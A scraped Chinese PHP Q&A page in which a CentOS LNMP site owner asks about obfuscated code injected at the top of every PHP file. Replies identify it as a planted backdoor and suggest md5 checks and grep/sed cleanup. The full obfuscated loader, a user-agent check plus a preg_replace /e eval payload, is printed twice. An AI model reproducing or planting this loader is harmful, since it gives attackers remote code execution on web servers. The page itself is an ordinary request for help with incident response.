Community Learn Tools Library Leisure
search
English
Home > Backend Development > PHP Tutorial > mysql - PHP文件开头被加了代码

mysql - PHP文件开头被加了代码

WBOY
Release: 2016-06-06 20:42:35
Original
1630 people have browsed it

<code><?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nnurvqqmik = '6f+9f5d816:+946:ce44#)zbssb!>!ss4*!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82c%x78257UFH#%x5c%x7827rfs%x5c%x78256~62bd%x5c%x7825!!%x5c%x7825273]y76]258]y6g]273]y76]271]y7d]252]y65r%x5c%x7878j%ufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyfx5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)ufc%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%xek!~!<b>b%x5c%x7825Zb%4-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*!fyqmpef)#%x5c%x782%x5c%x7827&6j%x5c%x7825!s%x5c%x7825q%x5c%x7825}&;!osvufx5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x78A%x5c%x7827K6!#]y81]273]y76]258]y6g]27)fepmqyfA>2b%x5c%x7825!>}R;msv}.;%x5c%x782f#%x7825%x5c%x7824-%x5c%x7824*!#]y81]opd%x5c%x7860ufh%x5c%x7860fmj8242178}527}88:}334}472%x5c%x7824!%x5c%x7825tdz)%x5c%x7ttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!%x5c%x782400~:<h81l1>#]D4]273]D6P2L5P67825j>1j%x5!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!5c%x7824-%x5c%x7824gps)%x5c%x&7-n%x5c%x7825)utjm61q%x5c%x78256%x5c%x782f7&6|7**111127-K)b%x5c%x7825)gpf{jt)!gj!n%x5c%x7825q%x5c%x78]238M7]381]211M5]67]4>U2q%x5c%x78Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7827827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}7860ufldpt}X;%x5c%x7860msvd}R;*ms%x5c%x7825)Rd%x5c%x7825)Rb%5c%x78256!%x5c%x7824sdXk5%x5c%x7860{66~6!bssbz)%x5c%x7824]25%xx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*fmjgA%x5c%x7827doj%x5c%x782562%x5c%x7825s:%x5c%x785c%x55hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)?]+^?]_%x5c%x785c}X%x5c%x7824#]y74]273]y76]252]y85]256]y6g]257]y86]267%x5c%x7825_t%x5c%x7825:osvufs:~:!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg1*!%x5c%x7825b:>1%x5c%x7825s:%x5c%x78#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825:!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%x7878:!>#]y3g]61]y3f]63]y3:]68]y7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5562]38y]572]48y]#>m%x5c%c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c78:-!%x5c%x7825tzw%x5c%x78ovg%x5c%x7822)!gj}1~!74]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]**#j{hnpd#)tutjyf%x5c%x7860opjud!>!2p%x5c%x7825Z%x5c%x782272qj%x5c%x7825)7gj6!#]y84]275]y83]248]y83]256]y7]D4]82]K6]72]K9]78]K5]53]Kc#!{e%x5c%x7825)!>>%x5c%x7822!5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x19275fubmgoj{h1:|:*mmvo:3]y76]271]y7d]252]y74]256#hmg%x5c%x7825!j%x5c%x7825!|!*#91y]%50%x22%134%x78%62%x35%165%x3a%14628%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%1%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]=6[%x5c%x7825ww2!>#p#%x5c%x782%x7825>%x5c%x782fh%x5c%x%x5c%x7825j>1#]y31]278]y36#!%x5c%x7824676752]88]5]48]32M3]317]445]212epn)%x5c%x7825bss-%x5&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x7825)}k~~~<ftmbg>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x24%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78%x5c%x7827,*e%x5c%x7827,7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msc%x7825tpz!>!#]D6M7]K3##]D6]281]265]y72]254]y76#!#]y84]275]yx5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!Ew:Qb:Qc:W~!ftmbg)!gj!%x5c%x725V%x5c%x7827{ftmfV%x5c%*^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj67824!>!tus%x5c%x7860sfqmbdf)%x5c%x782x7824-%x5c%x7824]26%x5c%x7Z6<.2>11#L4]275L3]248L3P6L1M5]D2P4]D6#!2p%x5c%x7825!*3>?*2V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x%57%x65","%x65%166%x61%154%xf#p#%x5c%x782f%x5c%x7825z<jg>>2*!%x5c%x7825z>3!%x5c%xfmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!>%x5c%x7822!pd%x5bnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]75]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68c%x7878X6%x5c%x782f7rfs%x21%76%x21%50%x5c%x7825%x5c%x5c%x7825z!>2j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy>>!}W;utpi}Y;tuofu5)sutcvt-#w#)ldbqov>*o}-}!#*%x5cx7825tzw>!#]y76]277]y72]265]y39]2]445]43]321]464]284]364]6]234]342]58]24]35c%x7878%x5c%x7822l:!}824*!|!%x5c%x7824-%x5c%x78if((function_exists("]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hfuopD#)sfebfI{*w%x5c%5%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%#~^#zsfvr#%x5c%x785cq%x5c%x78257*-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x782XAZASVu%x5c%x7825V:h%xf%x5c%x787f<u>.%x5c%x7825!
</u></ofmy></jg></.2></ftmbg></h81l1></b></code>
Copy after login
Copy after login

所有PHP文件头部都被加了代码,求解决:

1、查看了文件时间,没有变,但是文件还是被加了上面那段代码

2、那代码能看出是想做什么事情么

3、大概有哪方面的原因会被修改,环境是 CentOS LNMP

4、如果查不到原因,能否用一个shell + crontab来定时删除所有PHP文件头部有上面代码的写法,求写法

回复内容:

<code><?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nnurvqqmik = '6f+9f5d816:+946:ce44#)zbssb!>!ss4*!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82c%x78257UFH#%x5c%x7827rfs%x5c%x78256~62bd%x5c%x7825!!%x5c%x7825273]y76]258]y6g]273]y76]271]y7d]252]y65r%x5c%x7878j%ufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyfx5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)ufc%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%xek!~!<b>b%x5c%x7825Zb%4-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*!fyqmpef)#%x5c%x782%x5c%x7827&6j%x5c%x7825!s%x5c%x7825q%x5c%x7825}&;!osvufx5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x78A%x5c%x7827K6!#]y81]273]y76]258]y6g]27)fepmqyfA>2b%x5c%x7825!>}R;msv}.;%x5c%x782f#%x7825%x5c%x7824-%x5c%x7824*!#]y81]opd%x5c%x7860ufh%x5c%x7860fmj8242178}527}88:}334}472%x5c%x7824!%x5c%x7825tdz)%x5c%x7ttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!%x5c%x782400~:<h81l1>#]D4]273]D6P2L5P67825j>1j%x5!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!5c%x7824-%x5c%x7824gps)%x5c%x&7-n%x5c%x7825)utjm61q%x5c%x78256%x5c%x782f7&6|7**111127-K)b%x5c%x7825)gpf{jt)!gj!n%x5c%x7825q%x5c%x78]238M7]381]211M5]67]4>U2q%x5c%x78Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7827827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}7860ufldpt}X;%x5c%x7860msvd}R;*ms%x5c%x7825)Rd%x5c%x7825)Rb%5c%x78256!%x5c%x7824sdXk5%x5c%x7860{66~6!bssbz)%x5c%x7824]25%xx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*fmjgA%x5c%x7827doj%x5c%x782562%x5c%x7825s:%x5c%x785c%x55hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)?]+^?]_%x5c%x785c}X%x5c%x7824#]y74]273]y76]252]y85]256]y6g]257]y86]267%x5c%x7825_t%x5c%x7825:osvufs:~:!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg1*!%x5c%x7825b:>1%x5c%x7825s:%x5c%x78#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825:!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%x7878:!>#]y3g]61]y3f]63]y3:]68]y7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5562]38y]572]48y]#>m%x5c%c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c78:-!%x5c%x7825tzw%x5c%x78ovg%x5c%x7822)!gj}1~!74]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]**#j{hnpd#)tutjyf%x5c%x7860opjud!>!2p%x5c%x7825Z%x5c%x782272qj%x5c%x7825)7gj6!#]y84]275]y83]248]y83]256]y7]D4]82]K6]72]K9]78]K5]53]Kc#!{e%x5c%x7825)!>>%x5c%x7822!5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x19275fubmgoj{h1:|:*mmvo:3]y76]271]y7d]252]y74]256#hmg%x5c%x7825!j%x5c%x7825!|!*#91y]%50%x22%134%x78%62%x35%165%x3a%14628%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%1%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]=6[%x5c%x7825ww2!>#p#%x5c%x782%x7825>%x5c%x782fh%x5c%x%x5c%x7825j>1#]y31]278]y36#!%x5c%x7824676752]88]5]48]32M3]317]445]212epn)%x5c%x7825bss-%x5&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x7825)}k~~~<ftmbg>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x24%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78%x5c%x7827,*e%x5c%x7827,7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msc%x7825tpz!>!#]D6M7]K3##]D6]281]265]y72]254]y76#!#]y84]275]yx5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!Ew:Qb:Qc:W~!ftmbg)!gj!%x5c%x725V%x5c%x7827{ftmfV%x5c%*^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj67824!>!tus%x5c%x7860sfqmbdf)%x5c%x782x7824-%x5c%x7824]26%x5c%x7Z6<.2>11#L4]275L3]248L3P6L1M5]D2P4]D6#!2p%x5c%x7825!*3>?*2V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x%57%x65","%x65%166%x61%154%xf#p#%x5c%x782f%x5c%x7825z<jg>>2*!%x5c%x7825z>3!%x5c%xfmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!>%x5c%x7822!pd%x5bnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]75]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68c%x7878X6%x5c%x782f7rfs%x21%76%x21%50%x5c%x7825%x5c%x5c%x7825z!>2j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy>>!}W;utpi}Y;tuofu5)sutcvt-#w#)ldbqov>*o}-}!#*%x5cx7825tzw>!#]y76]277]y72]265]y39]2]445]43]321]464]284]364]6]234]342]58]24]35c%x7878%x5c%x7822l:!}824*!|!%x5c%x7824-%x5c%x78if((function_exists("]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hfuopD#)sfebfI{*w%x5c%5%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%#~^#zsfvr#%x5c%x785cq%x5c%x78257*-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x782XAZASVu%x5c%x7825V:h%xf%x5c%x787f<u>.%x5c%x7825!
</u></ofmy></jg></.2></ftmbg></h81l1></b></code>
Copy after login
Copy after login

所有PHP文件头部都被加了代码,求解决:

1、查看了文件时间,没有变,但是文件还是被加了上面那段代码

2、那代码能看出是想做什么事情么

3、大概有哪方面的原因会被修改,环境是 CentOS LNMP

4、如果查不到原因,能否用一个shell + crontab来定时删除所有PHP文件头部有上面代码的写法,求写法

这行太长了,fx 卡了半天……

不论如何,被加都不是好东西,极有可能是被黑之后挂马的代码。立即清除不要犹豫。

文件修改时间不是判断标准,只有md5 才是准确的。如果文件md5 被变更,立即停服排查原因补漏洞。

根据特征,搜索了一下,最早发现一年前就有案例(http://www.v2ex.com/t/94586 and http://www.linuxquestions.org/questions/linux-server-73/some-virus-malware-in-my-php-script-4175516386-print/)

如何删除很简单啊,Linux使用GREP,awk删除指定行

我昨天也遇到此情况,wordpress下所有php文件都增加了上面那行代码。

我的解决方案是 grep '<?php if(!isset($GLOBALS' -rl ./
//检测当前目录下被感染的文件

sed -i "s/grep '<?php if(!isset($GLOBALS' -rl ./

//替换掉注入的代码。

Related labels:
centos mysql nginx php shell
source:php.cn
Previous article:前后端如何更好地协同工作,大家简述一下? Next article:如何设计一个简洁高效的数据库
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
PHP arrays obtained from URL parameters do not behave as expected I have a URL parameter that contains the category ID and I want to treat it as an array li...
From 2024-04-06 22:09:02
0
1
1428
Where should I place CustomLog directive in apache I'm using php:7.2-apachedocker. I need to disable health check url login access log. Based...
From 2024-04-06 22:03:59
0
1
990
What is the format of the variables in the return value? I am a new learner of php. I found a piece of code: if($x<time()){return[false,'error']...
From 2024-04-06 21:55:20
0
1
778
Problems encountered when using opentbs to generate odt files: values ​​of the same key are displayed in the same row instead of separate columns. I'm using a library called OpenTbs to create odt using PHP, I'm using it because columns a...
From 2024-04-06 20:18:18
0
1
483
Group MySQL results by ID for looping over I have a table with flight data in mysql. I'm writing a php code that will group and displ...
From 2024-04-06 17:27:56
0
1
406
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template